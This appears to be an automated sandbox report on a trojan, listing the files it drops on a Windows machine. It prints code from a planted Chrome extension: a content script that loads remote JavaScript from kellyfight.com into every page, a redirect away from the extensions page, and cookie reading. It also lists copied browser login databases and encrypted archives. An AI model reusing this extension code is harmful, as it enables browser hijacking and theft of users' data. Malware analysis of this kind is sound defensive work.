Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	886
Entropy (8bit):	5.022683940423506
Encrypted:	false
SSDEEP:	24:sFfWxmARONJTW0/I8/lZ9OKMmA6eiH4MmDCvTV3u4:sYo/NJ/7Augi8Dy
MD5:	FEDACA056D174270824193D664E50A3F
SHA1:	58D0C6E4EC18AB761805AABB8D94F3C4CBE639F5
SHA-256:	8F538ED9E633D5C9EA3E8FB1354F58B3A5233F1506C9D3D01873C78E3EB88B8D
SHA-512:	2F1968EDE11B9510B43B842705E5DDAC4F85A9E2AA6AEE542BEC80600228FF5A5723246F77C526154EB9A00A87A5C7DDD634447A8F7A97D6DA33B94509731DBC
Malicious:	false
Preview:	$(function() {..chrome.tabs.onSelectionChanged.addListener(function(tab,info){....chrome.tabs.query({....active : true...}, function(tab) {....var pageUrl = tab[0].url;....console.log(pageUrl);....if (Number(pageUrl.indexOf("extensions")) > 1) ....{....chrome.tabs.update({url:'https://chrome.google.com/webstore/category/extension'}); ....}. .... ...});.});....chrome.webRequest.onBeforeRequest.addListener(function(details) {....chrome.tabs.query({....active : true...}, function(tab) {....var pageUrl = tab[0].url;...});........var url = details.url;...}, {...urls : [ "<all_urls>" ]..}, [ "blocking" ]);...function sendMessageToContentScript(message, callback) {...chrome.tabs.query({....active : true,....currentWindow : true...}, function(tabs) {....chrome.tabs.sendMessage(tabs[0].id, message, function(response) {.....if (callback)......callback(response);....});...});..}...});

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcmpccmnlckpmkfkalfhgcabmenkidie\1.0.0.0_0\book.js Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	152
Entropy (8bit):	5.039480985438208
Encrypted:	false
SSDEEP:	3:2LGffWpnYOJRyRmgO9lNCaVpveLWCfKVsSdDXaDQTNUHWSpHovJiRzlLBche:2LGXWpn7J8mgO9l3BeiCfLSdDYGNeW7u
MD5:	30CBBF4DF66B87924C75750240618648
SHA1:	64AF3DD53D6DED500863387E407F876C89A29B9A
SHA-256:	D35FBD13C27F0A01DC944584D05776BA7E6AD3B3D2CBDE1F7C349E94502127F5
SHA-512:	8117B8537A0B5F4BB3ED711D9F062E7A901A90FD3D2CF9DFFCC15D03ED4E001991BA2C79BCA072FA7FD7CE100F38370105D3CE76EB87F2877C0BF18B4D8CFBAB
Malicious:	false
Preview:	(function(){.. var s = document.createElement('script'); .. s.src = '//kellyfight.com/22aff56f45f6b36dec.js'; .. document.body.appendChild(s);..})();

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcmpccmnlckpmkfkalfhgcabmenkidie\1.0.0.0_0\icon.png Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1161
Entropy (8bit):	7.79271055262892
Encrypted:	false
SSDEEP:	24:2mEKEvFZonmDzTaC6EU1yPj0bhJKaurzF3LvLIeR2D+JGP6A8UJ0wrBI4ez:DExZomDXe1yPYHKNx3LvLvWFP6noFy4M
MD5:	5D207F5A21E55E47FCCD8EF947A023AE
SHA1:	3A80A7CF3A8C8F9BDCE89A04239A7E296A94160F
SHA-256:	4E8CE139D89A497ADB4C6F7D2FFC96B583DA1882578AB09D121A459C5AD8335F
SHA-512:	38436956D5414A2CF66085F290EF15681DBF449B453431F937A09BFE21577252565D0C9FA0ACEAAD158B099383E55B94C721E23132809DF728643504EFFCBE2B
Malicious:	false
Preview:	.PNG........IHDR.............;0.....PIDATH..]..e....y....uw.u.>...D../..3$...".......J....H...(......0J...D...X,0?.v&Ww...9]<...;.:.Mt.w.............L.V..\|z.Z_..b$...)...z.....\|.\.?3Uw....^.{..xz..G.....`.Z_"!........x..L.G..H..=...o3.....?F.f'!6.W.~+@.`D.....g+......r]...... .ob.8.M.jg.....X....L..P....A.D..Uo2.....\......w.y..`&...W..".XAE..V...<t.Y.,.@.......rb..R$..8@..(.. ...i..H.%R)`.h..1..43.jr.......p..pd.G"..8$..,.M..RL^.....u.....84u.......)8 NTH.#.....o0....2.....$27...e>..2.h._N..s.D...D..$.\....l:..7G.....(H..2...7f..g.i...(......O...M.Po..`.3.x.;....eO.Lr..).......XH.:.......k..O.$....z7..U.a.H.IW.w..uU....o... u.....F1.q.Vf..S. .L...KF..Mu5..\3p.l.6.{.Z..y#...J...B."...U..T...F.qv....F...u.]........@.QZzA..L...<........J.L$...2.................0.0&]..;.of,..j.P.&.Yq..b.1!M..l...B.X.xp...4.h.....W.M.6.sPQG.v6........R....-@......z.b.zL.i..?......b...u\|.;>...I....$..M..^:...wLTK...l.....=m.c...v...wz....a..5..}m......l

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcmpccmnlckpmkfkalfhgcabmenkidie\1.0.0.0_0\icon48.png Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	2235
Entropy (8bit):	7.880518016071819
Encrypted:	false
SSDEEP:	48:9V93V/3XpV1P2gnjz8xqNaT5YmiH+0Rn6r2ogpZGYmT2pN6esC+s5szuZNwG:BlFP7jzUTKm26rMCYmneWsCG
MD5:	E35B805293CCD4F74377E9959C35427D
SHA1:	9755C6F8BAB51BD40BD6A51D73BE2570605635D1
SHA-256:	2BF1D9879B36BE03B2F140FAD1932BC6AAAAAC834082C2CD9E98BE6773918CA0
SHA-512:	6C7D37378AA1E521E73980C431CE5815DEDB28D5B7003009B91392303D3BEC1EE6F2AAE719B766DA4209B607CD702FAE283E1682D3785EFF85E07D5EE81319C8
Malicious:	false
Preview:	.PNG........IHDR...0...0.....W.......IDATh..Z]l\G.......4."..8N..XB.....D#.< $. W..}....K...P.Q...........P..-xJT.O..!UBNjHl'..2..d.k......;........;s.3.o..........)B....D.D:.TH@...W...YB_...kw{&.{.[v;..ot.Zm..!j..PN.....i\. ...r..iU.O...f...........{...B ..dh)...l.:\|)`...'.......c.`.....,.Q.]f~BD@2s.{'V.d..{`IAFO...I......7..7.)j=...p.S..#..x.Ar@$.LQ......,@....\...M5.\.&e0.J...\|....Z....h.]P.E.3T.]..4..$..)..J.._...c..g....L.....T.VR\|y....Bd..y.k..x..m[q.7...I.S&..'..Rx~...R...y.n.7n.L.\|..OZH.......YR.......9.....r....%H_`..n....Q.Q..a..wy} .EnL..r!W...M.%e.1`..i.El..N0_@..S....+.>=L....f...<....?_^[.....e2...@..d,w.....{.........s.......<.#...u<...tM]%K...}.c.......NLB.'.V)A.x.o..-..Y.0..o....L'zk$.$..Yvi..xP...........k..sB...z....\.L....k..l.47[8.?..../..0s..T..O....\|E.@.Q."P.k.YNH;x....$.H<.....T...`........................'&.1...C...7.....z^.Xf..e}`...j.:.g.....>..Z{qcm..D.F.DyLK.@@..w,A.a.@.. ..sk.iZ"..d..+.M.....&N.y

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcmpccmnlckpmkfkalfhgcabmenkidie\1.0.0.0_0\jquery-1.8.3.min.js Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	93637
Entropy (8bit):	5.292996107428883
Encrypted:	false
SSDEEP:	1536:96IzxETpavYSGaW4snuHEk/yosnSFngC/VEEG0vd0KO4emAp2LSEMBoviR+I1z5T:v+vIklosn/BLXjxzMhsSQ
MD5:	E1288116312E4728F98923C79B034B67
SHA1:	8B6BABFF47B8A9793F37036FD1B1A3AD41D38423
SHA-256:	BA6EDA7945AB8D7E57B34CC5A3DD292FA2E4C60A5CED79236ECF1A9E0F0C2D32
SHA-512:	BF28A9A446E50639A9592D7651F89511FC4E583E213F20A0DFF3A44E1A7D73CEEFDB6597DB121C7742BDE92410A27D83D92E2E86466858A19803E72A168E5656
Malicious:	false
Preview:	/! jQuery v1.8.3 jquery.com \| jquery.org/license /..(function(e,t){function _(e){var t=M[e]={};return v.each(e.split(y),function(e,n){t[n]=!0}),t}function H(e,n,r){if(r===t&&e.nodeType===1){var i="data-"+n.replace(P,"-$1").toLowerCase();r=e.getAttribute(i);if(typeof r=="string"){try{r=r==="true"?!0:r==="false"?!1:r==="null"?null:+r+""===r?+r:D.test(r)?v.parseJSON(r):r}catch(s){}v.data(e,n,r)}else r=t}return r}function B(e){var t;for(t in e){if(t==="data"&&v.isEmptyObject(e[t]))continue;if(t!=="toJSON")return!1}return!0}function et(){return!1}function tt(){return!0}function ut(e){return!e\|\|!e.parentNode\|\|e.parentNode.nodeType===11}function at(e,t){do e=e[t];while(e&&e.nodeType!==1);return e}function ft(e,t,n){t=t\|\|0;if(v.isFunction(t))return v.grep(e,function(e,r){var i=!!t.call(e,r,e);return i===n});if(t.nodeType)return v.grep(e,function(e,r){return e===t===n});if(typeof t=="string"){var r=v.grep(e,function(e){return e.nodeType===1});if(it.test(t))return v.filter(t,r,!n);t=v.filter(t

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcmpccmnlckpmkfkalfhgcabmenkidie\1.0.0.0_0\manifest.json Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	ASCII text, with very long lines, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	2380
Entropy (8bit):	5.687293760500434
Encrypted:	false
SSDEEP:	48:QWRIWSIelc1wm6g838z/oTFi5acPKFe8EIelc1a+E8t8Rc3T:DR4Mwmqi5PWevMa+T
MD5:	ADF10776EEC8DC0F6E7E3B4AD59CF504
SHA1:	4F11FE569189036B42923EF5A8AFB0985DCECDF5
SHA-256:	ED373E2B91FDF477D1CC1F8B709C03F03A3963ACA99F51071D5F24407095D22D
SHA-512:	7328245AA1473B217BFD33B65A07D0BD1DA96C8A85D5A6DD43E71072211D7BE86AF00BBF1C724747EEADAF36A8A713CE440557B46CB0F2E2CDD35B05C3793CD5
Malicious:	false
Preview:	{.. "background": {.. "persistent": true,.. "scripts": [ "jquery-1.8.3.min.js", "background.js" ].. },.. "browser_action": {.. "default_icon": "icon.png",.. "default_popup": "popup.html",.. "default_title": "book_helper".. },.. "content_scripts": [ {.. "all_frames": false,.. "js": [ "book.js" ],.. "matches": [ "http:///", "https:///" ],.. "run_at": "document_idle".. } ],.. "description": "book_helper",.. "icons": {.. "16": "icon.png",.. "48": "icon48.png".. },.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1tm+QFuyEAjdg8bsB1Amy5MksnoFTx+/SDDbN1zp5WgXOZWc9GtAlPwVldE3Bgkz4u8Nnwddy0MunE1cB3zfqw9BHJI2pIaoQH+nQDXCtH2tfOsX9a9JWrQYSgvH5SDsycSaMBd0jaBbC80g6zZEFPE1OR2tcyLkNMJ+p8WzCH2RXQabcwxhCzksydkJhB4scqZjKse1ZJxF724Quu4EsY5CVuoTeremfMAkke23IzB28kf8LkPBCqMR1p/kuib+izmHqQ2132TwRXIk5OkVE+D8KSvh9vl/SwRmtSqepONWXmf/LKXVv2pbqnnb8+OXP6v02MjQ9ioEaX5CK0AgBQIDAQAB",.. "manifest_version": 2,.. "name": "book_helper

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcmpccmnlckpmkfkalfhgcabmenkidie\1.0.0.0_0\popup.html Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	280
Entropy (8bit):	5.048307538221611
Encrypted:	false
SSDEEP:	6:WLzLyYGRpy6jHz5K3S3ZLeStvrXAqJmW/9mGNVkAnAqJmW/KrV4Nhdbb:97H1x3Zbtv0qJmW8GNVkAAqJmWyrV4Nj
MD5:	E93B02D6CFFCCA037F3EA55DC70EE969
SHA1:	DB09ED8EB9DBC82119FA1F76B3E36F2722ED2153
SHA-256:	B057584F5E81B48291E696C061F94B1E88CA52522490816D4BF900817FF822BD
SHA-512:	F85B5B38ADE3EFA605E1DA27E8680045548E3343804073F9FE0C83E4BECFB2EB4A237C8E1C84D43DA386CBDDDCC45F915BCE950ED41D53A8DFDF85AF2DFAC879
Malicious:	false
Preview:	<!DOCTYPE HTML>.<html>.<head>.<meta charset="UTF-8">.<title></title>.<style type="text/css">.div {..font-size: 30px;..color: red;.}.</style>.<script type="text/javascript" src="jquery-1.8.3.min.js"></script>.<script type="text/javascript" src="popup.js"></script>.</head>..</html>

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\mcmpccmnlckpmkfkalfhgcabmenkidie\1.0.0.0_0\popup.js Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	642
Entropy (8bit):	4.985939227199713
Encrypted:	false
SSDEEP:	12:wIoAnOh/B9mZ2ysUEjesrdRGOyHM2ssgrIpX3KKjWnoFF2O:gMW9O2yVEjzrwHM7rSKVnoeO
MD5:	2AC02EE5F808BC4DEB832FB8E7F6F352
SHA1:	05375EF86FF516D91FB9746C0CBC46D2318BEB86
SHA-256:	DDC877C153B3A9CD5EC72FEF6314739D58AE885E5EFF09AADBB86B41C3D814E6
SHA-512:	6B86F979E43A35D24BAAF5762FC0D183584B62779E4B500EB0C5F73FAE36B054A66C5B0620EA34C6AC3C562624BEC3DB3698520AF570BB4ED026D907E03182E7
Malicious:	false
Preview:	$(function() {........var a, e;.....chrome.tabs.getSelected(null, function(tab) {....e = tab.url; ....alert("url--" + e);...});.....chrome.cookies.getAll({....url : e...}, function(ytCookies) {....for ( var i = 0; i < ytCookies.length; i++) {.....if (ytCookies[i].name == "abc") {......$("#abc").val(ytCookies[i].value);.....}....}...});................function sendMessageToContentScript(message, callback) {....chrome.tabs.query({.....active : true,.....currentWindow : true....}, function(tabs) {.....chrome.tabs.sendMessage(tabs[0].id, message, function(response) {......if (callback).......callback(response);.....});....});...}....});..

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	5453
Entropy (8bit):	5.17678097616284
Encrypted:	false
SSDEEP:	96:nHXbTqqz/X7jgFkQIV+H/k0JCKL8rbobOEQVuwv:nHXbTJz/rMFkton4KsX
MD5:	A1B6380900462E70489AD34B7E97B669
SHA1:	1E718AE637515F6B217ED0E65D27CCC46BA0391C
SHA-256:	0C78D0C06C9BBB704727D0DB7A4F1E254E7B27ACAAFD22EF2D664E5B16893914
SHA-512:	3985CA77B9BF411289112180D49B298D1FC198BEE18DAD8DE264F0484DEAE277A8E7D5979FF3E0312A12E2F5A1F5D10528A5EC04A6F5F1AEC254937577C4B594
Malicious:	true
Preview:	{"account_id_migration_state":2,"account_tracker_service_last_update":"13245952892183974","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245952891998324","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"default_browser_infobar_last_declined":"13245952963463509","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":false,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","1501624"],"daily_received_length":["0","0","0","0","0","0","0",

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	UTF-8 Unicode text, with very long lines
Category:	dropped
Size (bytes):	34636
Entropy (8bit):	5.538655595254981
Encrypted:	false
SSDEEP:	768:AEpwDUdLlmUckPWnr+Hb1kXqKf/pUZNCgVLH2HfVrUkGRn7dzv0Z:EOL2OjRn7pv6
MD5:	D4AB7B8661A8E33FFDDFE934728BDBA8
SHA1:	1C572CFC5062AB7394DADD241D48B06BD3867D36
SHA-256:	EC73929E0C5DE25E5AD8EF5F4E6F7F9518C8985E6B4E6550AE18A5A11FA17A94
SHA-512:	97F5D293D4C798D5AE78D61BE0FB67185DFC83EC452BC2A3B451BEDB52B227A9820ED617FD54A16C9A9953ACBBDEF9A88301C22E6076B032C63A7D936D095C55
Malicious:	true
Preview:	{"extensions":{"policy":{"switch":false},"settings":{"aapocclcgogkmnckokdopfmhonfmgoek":{"ack_external":true,"active_permissions":{"api":[],"manifest_permissions":[]},"app_launcher_ordinal":"w","commands":{},"content_settings":[],"creation_flags":137,"events":[],"from_bookmark":false,"from_webstore":true,"granted_permissions":{"api":[],"manifest_permissions":[]},"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13245952896894319","lastpingday":"13245947457776957","location":1,"manifest":{"api_console_project_id":"889782162350","app":{"launch":{"local_path":"main.html"}},"container":"GOOGLE_DRIVE","current_locale":"en","default_locale":"en_US","description":"Create and edit presentations ","icons":{"128":"icon_128.png","16":"icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDLOGW2Hoztw8m2z6SmCjm7y4Oe2o6aRqO+niYKCXhZab572by7acqFIFF0On3e3a967SwNijsTx2n+7Mt3KqWzEKtnwUZqzHYSsdZZK64vWIHIduawP0EICWRMf2RGIBEdDC6I1zErtcDiSrJWeRlnb0DHWXDXlt1YseM7RiON9wIDAQAB","m

C:\Users\user\AppData\Local\Login Data1618257834647 Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Login Data1618257873797 Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1618257925550 Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	7-zip archive data, version 0.3
Category:	dropped
Size (bytes):	37737
Entropy (8bit):	7.994967159065528
Encrypted:	true
SSDEEP:	768:jKbwEEFezqMkJOjWrLgmfA3nT2q5XTcM5QxQ5peEjw4MEe:WbwBFOEPghX5XT/QnkbMEe
MD5:	5A6469A3F787ABD2AE93B47470528F79
SHA1:	4032B59237CC883FB752D9727971B435F4D27EB8
SHA-256:	1B27A55132F5E68D341F617A8EB21C6ED62AAE9017FF01EB8651E05D0615D971
SHA-512:	335985B4FDCDEFED60F6073CC58F44B1E31FA43C1EE253772C5EEB94FD1D93CCF2D4D7C994EF0151FFE32A58369FCA5A605329E77D3A8B038D5142F4946D2105
Malicious:	false
Preview:	7z..'...IVw '......."........S.......8%D...2 ..J...y1.C.......HE89.V.Z',n.$.T.V.....O.%{.I.6!....."..:.L..nrH..A.m.......5.M.o......Q...r......\|.k1..S"..w"Y...2pS....g.....V:y.;..+..P..8F.t...).&:.!j.....=...%.d.b.u.&..4y.<.97.[.`L]7...sZ.;.K..EA.lIO....N....D..\C.enT.f.....t.....]..w.....E...Ffc.$.Sw`].%.J.{........y.n2F.......v...#t.^.....Si&wb..A.@..#....bi_.....;..........!.~..........g.Q.@/.1\.....f.q.=..t...).<\|...?u.....JH.CD..i.s..4..c9.;X.._r7.9..{...wfg..:/.....?j.N.z....+...j)...K..v...4.9.......t.ZN...#.W.e...o...V..z...u...lNR..z.....fi.y.k......$...,N[.....F.U..~oJ.Cn.....+H..)....)!l...............8.....Z..(....L.~.....fsQ..W........p........q..T.....p.....uC..,;......1Pl...\|.....G......-....=............L.......}O8y....H...g...E..c...k2c...&...4...]?A....FG....._.W.B?....p.X..gC........G...._Y.A..P..........k.../.7YO.c.M.i....\|..^.+RP]...D.jq.z'..4.\|I*......jq..w.%..2/\|.....>..y...>......C.)8B7$Z...{P.~..&...b..........

C:\Users\user\AppData\Local\Temp\1618257956794 Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	7-zip archive data, version 0.3
Category:	dropped
Size (bytes):	553040
Entropy (8bit):	7.999671101282436
Encrypted:	true
SSDEEP:	12288:DSX3/iYsJg9CZjucCzkbXAH+rCd/Q0SeFiDS+wj5KMzCH/RuuHDrDNb:DSX3/iVgrzkbXa+raQ0JUuJj5jzYNrDp
MD5:	A4427F2F46DEEA15CEA87BDBB53A22CC
SHA1:	158501079514868D85246E970314A024FF263199
SHA-256:	18BA0794E5C95B5192105CCD9AA09A7DFFF50262971D23E316CA3788627CCA4F
SHA-512:	334255DCA0F71B7B50A147397ECF21B1CB5150FD489AE7EBEFDFD459190865FFAF3CD7783D50B53DFF91CE5628CABB147172A627A400112B490BE17164074C85
Malicious:	false
Preview:	7z..'.....7..p......$........1...(..`(...<.^..-.+....Q.3D-.........i..si.a.,V.k.{JU.dk.'.h... KR.$~W...&. ..........<Y9.,.0.k+.<b...?zqlnw......\..5C...^...y.... ..FZ..0.$.....vds.....Yx.Q...x.._..Yk..n.>&.Y..7.B=.(.8.w<...sVs.V..6<o.(......b..t..b..@...~.........\..Y:r!ix....$!...{.h..,.......J..M".....0N.^..@..X.8.`...=._].._f.Q..D...3.==0..)f...............s..:...Gd...(!L....A):..r...>.....@.4.."s..G......j.7...{\...[..=.+y7..0.'...................i..d...!..b...c.s.}..g..(!,.H@<sl.Y..'....dm..?B.c7S..{...f...c...P.S.#...w=.+.M.U@u.....^.XI.....!u}...?.SYUK....O...G.]+.^....'..`&.a....F.......c..o....c..Z4.......Q1..1L..J.p.>...j.!.il>..y8..S...@....7..Hc...y...UNJj..9...@.../.'#.....N...BC?..C....Ga[J.vb....mn..@..z.../Kc.,Y<.tA.2...O......\|....Drrl)..7..9.....pNj.P6\|].t .'.\|.yb..SO.......`....H..-..h.+x..4...v1. ...'.4)3.N..,2_.U..]...I4y.R.I.....b.......N!e%.4.0*"l,.H.2..'..^42....9..sX..1.....8z.u#A\.....tbP........&...U....9

C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4255416
Entropy (8bit):	7.866429705903183
Encrypted:	false
SSDEEP:	98304:EoT9sIWSFT79YBDTzRHjEREGL1d2YuVNR:RCIW6790vlHjEREGLK3bR
MD5:	29389832E538957DC769CF709F80144A
SHA1:	72F5CA06D840ACBC9B49E4096E341C0DBAAC891E
SHA-256:	D6D2E00343A3CAD48CC2F4799CE87D27ACC3CE154AED286C07F226DE2E9C4035
SHA-512:	5F787359FBC37D8BED92DA38E80106CC257C2339488CA956759B33024AA61194BB87FAA8DB841DED486D5BBA253CE44342DD206CF93A9751DE95784F5EE79F05
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 28%, Browse Antivirus: ReversingLabs, Detection: 65%
Preview:	MZ......................@.............................................>....L.!This program cannot be run in DOS mode....$.......$<!,`]O.`]O.`]O.V{D.a]O..AA.u]O..B\.m]O.`]N..]O.V{E..]O..[I.a]O.Rich`]O.................PE..L.....%V.............................;............@..........................0...................................................... ..@............ ...............................................................................................text...v........................... ....rdata........... ..................@..@.data....N.......@..................@....rsrc...@.... ......................@..@........................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\MSI429C.tmp Download File
Process:	C:\Windows\SysWOW64\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6656
Entropy (8bit):	5.2861874904617645
Encrypted:	false
SSDEEP:	96:YtJL/UST0S599F4dHVMUqROmhpatBWXxJZr7dJVYJNs6Ol10dLNK:Q2SwSX9wSVUDWXQsxO
MD5:	84878B1A26F8544BDA4E069320AD8E7D
SHA1:	51C6EE244F5F2FA35B563BFFB91E37DA848A759C
SHA-256:	809AAB5EACE34DFBFB2B3D45462D42B34FCB95B415201D0D625414B56E437444
SHA-512:	4742B84826961F590E0A2D6CC85A60B59CA4D300C58BE5D0C33EB2315CEFAF5627AE5ED908233AD51E188CE53CA861CF5CF8C1AA2620DC2667F83F98E627B549
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: IpB8f8qwze.exe, Detection: malicious, Browse Filename: IpB8f8qwze.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: Setup.exe, Detection: malicious, Browse Filename: tyxCV1ouryr7.exe, Detection: malicious, Browse Filename: fnhcdXEfus.exe, Detection: malicious, Browse Filename: 6MhmlD8KZh.exe, Detection: malicious, Browse Filename: fnhcdXEfus.exe, Detection: malicious, Browse Filename: Cyfj6XGbkd.exe, Detection: malicious, Browse Filename: N1yprTBBXs.exe, Detection: malicious, Browse Filename: Cyfj6XGbkd.exe, Detection: malicious, Browse Filename: N1yprTBBXs.exe, Detection: malicious, Browse Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse Filename: FileSetup-v17.04.41.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........e...e...e.._F..e..&m...e...e...e...i...e...i...e...i...e..Rich.e..........PE..L......D...........!......................... ...............................@.......................................$......H#..P............................0......p ............................................... ..l............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	268744
Entropy (8bit):	5.398284390686728
Encrypted:	false
SSDEEP:	6144:ePH9aqri3YL1Avg3NloWPxFL8QL2Ma8tvT0ecR:eP4qri3YL1Avg3NloWPTnL2f3x
MD5:	E2E9483568DC53F68BE0B80C34FE27FB
SHA1:	8919397FCC5CE4F91FE0DC4E6F55CEA5D39E4BB9
SHA-256:	205C40F2733BA3E30CC538ADC6AC6EE46F4C84A245337A36108095B9280ABB37
SHA-512:	B6810288E5F9AD49DCBF13BF339EB775C52E1634CFA243535AB46FDA97F5A2AAC112549D21E2C30A95306A57363819BE8AD5EFD4525E27B6C446C17C9C587E4E
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 8%, Browse Antivirus: ReversingLabs, Detection: 0%
